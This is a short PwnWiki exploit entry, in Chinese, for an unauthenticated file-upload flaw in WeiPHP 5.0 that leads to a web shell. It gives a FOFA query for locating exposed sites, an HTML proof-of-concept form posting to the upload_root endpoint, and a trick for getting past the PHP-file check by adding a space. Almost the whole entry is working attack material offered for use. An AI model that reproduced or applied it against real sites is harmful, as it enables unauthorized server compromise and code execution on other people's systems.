Weiphp5.0上傳getshell
From PwnWiki
FOFA
body=”weiphp5.0”
POC
構造html表單提交上傳:
<html> <body> <form action="http://127.0.0.1/weiphp/public/index.php/home/File/upload_root" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="download" id="file" /> <br /> <input type="submit" name="submit" value="Submit" /> </form> </body> </html>
用表單進行提交,上傳成功(由於該代碼有驗證是否為php,所以空格繞過即可)
